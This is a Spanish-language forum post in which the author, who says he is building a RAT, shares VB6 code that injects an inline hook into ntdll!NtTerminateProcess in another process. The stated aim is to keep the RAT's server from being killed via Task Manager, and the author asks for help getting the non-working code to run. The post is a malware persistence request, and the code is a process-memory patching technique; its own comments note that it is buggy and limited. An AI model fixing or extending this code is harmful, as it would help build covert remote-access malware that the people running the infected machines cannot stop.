Visual Basic / NtTerminateProcess Hook
Septiembre 23, 2013, 10:37:23 AM
Hola gente, he estado investigando últimamente un poco sobre métodos para proteger la ejecución del servidor de mi RAT y al final me he decidido a hacer un hook a la API NtTerminateProcess para evitar que la ejecución del servidor pueda ser interrumpida desde el administrador de tareas. Sé que hay maneras mucho mejores de hacer lo que quiero, pero quería algo no muy complicado para una primera versión del RAT, y con protegerlo del usuario medio que intentara pararlo desde el administrador de tareas me basta. He estado intentando hacerlo yo solo, pero solo conseguía que el programa crasheara, así que me he puesto a buscar por la red si alguien había hecho esto mismo en VB6. Al final he encontrado este código:

Código: vb
    ' Module-level declarations for a 5-byte inline JMP hook of ntdll!NtTerminateProcess
    ' that is written into the memory of another process (see HookNtTerminateProcess).
    ' 32-bit only: every pointer travels in a Long and the patch is a rel32 JMP.
    Option Explicit 
     
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    ' Local memcpy; used below to copy the rel32 displacement into NewCode(1..4).
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
    ' Resolved in the *calling* process; the hook code below hands it a module base
    ' obtained from the *target* process (see the note in HookNtTerminateProcess).
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    ' lpcbNeeded is declared ByVal As Long; the caller passes VarPtr(cbNeeded) to compensate.
    Private Declare Function EnumProcessModules Lib "psapi" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByVal lpcbNeeded As Long) As Long
    ' ANSI variant; receives a pre-sized String buffer and returns the number of characters copied.
    Private Declare Function GetModuleFileNameEx Lib "psapi" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
     
    Private Const MEM_RELEASE = &H8000
    Private Const MEM_COMMIT = &H1000
    Private Const MEM_RESERVE = &H2000
    Private Const PAGE_EXECUTE_READWRITE = &H40 ' the trampoline page must be executable
    ' Full access is requested; OpenProcess will fail (returns 0) for targets the caller
    ' is not allowed to open, e.g. higher-integrity or protected processes.
    Private Const PROCESS_ALL_ACCESS = &H1F0FFF
     
    ' State shared by Hook/Unhook. Only one hook at a time is tracked; a second
    ' HookNtTerminateProcess call overwrites these without unhooking the first.
    Private hProcess As Long    ' handle to the patched process; released by UnhookNtTerminateProcess
    Private FuncAddr As Long    ' address of NtTerminateProcess as resolved in this process
    Private OldCode(4) As Byte  ' the 5 original bytes at FuncAddr, restored on unhook
    Private NewCode(4) As Byte  ' E9 + rel32: JMP to CodeAddr, written over FuncAddr
    Private HookCode(4) As Byte ' xor eax,eax / ret 8: written to CodeAddr
    Private CodeAddr As Long    ' page allocated in the target process that holds HookCode
     
    ' Returns the base address (module handle) inside hProcess of the module whose full
    ' file name equals ModuleName (case-insensitive, whole path), or 0 if none matches.
    ' This is a local helper that happens to share its name with a Win32 API of the same
    ' name; it is not that API.
    ' NOTE(review): the comparison is an exact full-path match, so the caller's hard-coded
    ' path must be exactly what GetModuleFileNameEx reports for the target (system drive,
    ' and on 64-bit Windows the 32-bit ntdll is reported under SysWOW64) -- verify on the
    ' target system.
    Private Function GetModuleHandleEx(ByVal hProcess As Long, ByVal ModuleName As String) As Long
    Dim hMods(1024) As Long   ' room for 1025 module handles (indices 0..1024)
    Dim cbNeeded As Long      ' bytes EnumProcessModules says are *needed*, which may exceed the buffer
    Dim szModName As String
    Dim i As Integer
     
    ' EnumProcessModules fails for a 64-bit target enumerated from a 32-bit caller.
    If EnumProcessModules(hProcess, hMods(0), 1025 * 4, VarPtr(cbNeeded)) Then
        ' '/' is floating-point division, so the loop upper bound is the module *count*,
        ' i.e. one past the last valid entry; the If hMods(i) guard skips that empty slot.
        ' NOTE(review): if the target has more than 1025 modules, cbNeeded exceeds the
        ' buffer size and i runs past the end of hMods (subscript out of range).
        For i = 0 To (cbNeeded / 4)
            If hMods(i) Then
                szModName = String(260, 0)
                If GetModuleFileNameEx(hProcess, hMods(i), szModName, Len(szModName)) Then
                    ' Trim at the first NUL. If no NUL is present (name fills all 260
                    ' chars) InStr returns 0 and Left(..., -1) raises a runtime error.
                    szModName = Left(szModName, InStr(1, szModName, Chr(0)) - 1)
                    If LCase(szModName) = LCase(ModuleName) Then ' whole-path, case-insensitive match
                        GetModuleHandleEx = hMods(i)
                        Erase hMods ' fixed-size array: Erase just zeroes it
                        Exit Function
                    End If
                End If
            End If
        Next i
    End If
    Erase hMods
    End Function
     
    ' Patches ntdll!NtTerminateProcess inside the process identified by ProcessId so that
    ' any call to it made *from within that process* returns 0 (STATUS_SUCCESS) without
    ' doing anything. Returns True only if every step succeeded; on success hProcess,
    ' FuncAddr, OldCode and CodeAddr are left set for UnhookNtTerminateProcess.
    '
    ' Effect and limits, as visible from the code:
    '  - Only the patched process is affected. A call to TerminateProcess issued by some
    '    other process (e.g. a task manager) executes NtTerminateProcess in *that* process's
    '    own ntdll, which this function does not touch.
    '  - 32-bit only: rel32 JMP and Long-sized pointers; fails in a 64-bit target.
    '  - NOTE(review): the patched function presumably also sits on the process's own
    '    normal exit path (ExitProcess), so the patched process may no longer be able to
    '    exit cleanly -- confirm.
    '  - NOTE(review): the OpenProcess handle is leaked on every failure path, and the
    '    return values of ReadProcessMemory/WriteProcessMemory are ignored, so the function
    '    can report True after a partial write.
    Public Function HookNtTerminateProcess(ByVal ProcessId As Long) As Boolean
    Dim hMod As Long
     
    NewCode(0) = &HE9 ' jmp rel32; bytes 1..4 are filled in below
    ' Trampoline body written to CodeAddr:
    '   xor eax,eax   ; return STATUS_SUCCESS
    '   ret 8         ; stdcall cleanup of the two DWORD arguments (ProcessHandle, ExitStatus)
    HookCode(0) = &H33
    HookCode(1) = &HC0
    HookCode(2) = &HC2
    HookCode(3) = &H8
    HookCode(4) = &H0
     
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, ProcessId)
     
    If hProcess Then
        ' Hard-coded full path; must match GetModuleFileNameEx's output exactly
        ' (different system drive or WOW64 path => hMod = 0 and the function returns False).
        hMod = GetModuleHandleEx(hProcess, "c:\windows\system32\ntdll.dll")
        If hMod Then
            ' hMod is the module base *in the target*, but GetProcAddress resolves it in this
            ' process. This only yields the right address if ntdll is mapped at the same base
            ' in both processes -- assumed here, not checked.
            FuncAddr = GetProcAddress(hMod, "NtTerminateProcess")
            If FuncAddr Then
                ' Save the 5 bytes the JMP will overwrite, for UnhookNtTerminateProcess.
                ReadProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
                ' 5-byte RWX page in the target for the trampoline.
                CodeAddr = VirtualAllocEx(hProcess, ByVal 0, 5, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
                If CodeAddr Then
                    ' rel32 = target - (address of JMP + 5). Copies the 4 bytes of the Long
                    ' into NewCode(1..4).
                    ' NOTE(review): VarPtr is applied to a temporary expression, not a
                    ' variable -- confirm this compiles and behaves as intended in VB6.
                    CopyMemory VarPtr(NewCode(1)), VarPtr(CodeAddr - FuncAddr - 5), 4
                    ' Write the trampoline first, then redirect the function prologue to it.
                    ' The code page of ntdll is not made writable explicitly; this relies on
                    ' WriteProcessMemory handling the protection change.
                    WriteProcessMemory hProcess, ByVal CodeAddr, HookCode(0), 5, 0
                    WriteProcessMemory hProcess, ByVal FuncAddr, NewCode(0), 5, 0
                    HookNtTerminateProcess = True
                End If
            End If
        End If
    End If
    End Function
     
    ' Reverses HookNtTerminateProcess: restores the 5 saved bytes at FuncAddr, frees the
    ' trampoline page and closes the process handle. Relies entirely on the module-level
    ' state left by a *successful* hook; if called without one (hProcess = 0) or after a
    ' partial failure, the writes and the free simply fail -- their results are ignored.
    Public Sub UnhookNtTerminateProcess()
    WriteProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0
    ' MEM_RELEASE requires dwSize = 0 per the Win32 contract; 5 is passed here.
    ' NOTE(review): confirm whether this call actually releases the page.
    VirtualFreeEx hProcess, ByVal CodeAddr, 5, MEM_RELEASE
    CloseHandle hProcess
    End Sub


El caso es que no consigo comprender el código al 100% y este no funciona de ninguna manera...

¿Alguien me echa una mano para comprenderlo y ver por qué no funciona?

Un saludo  ;)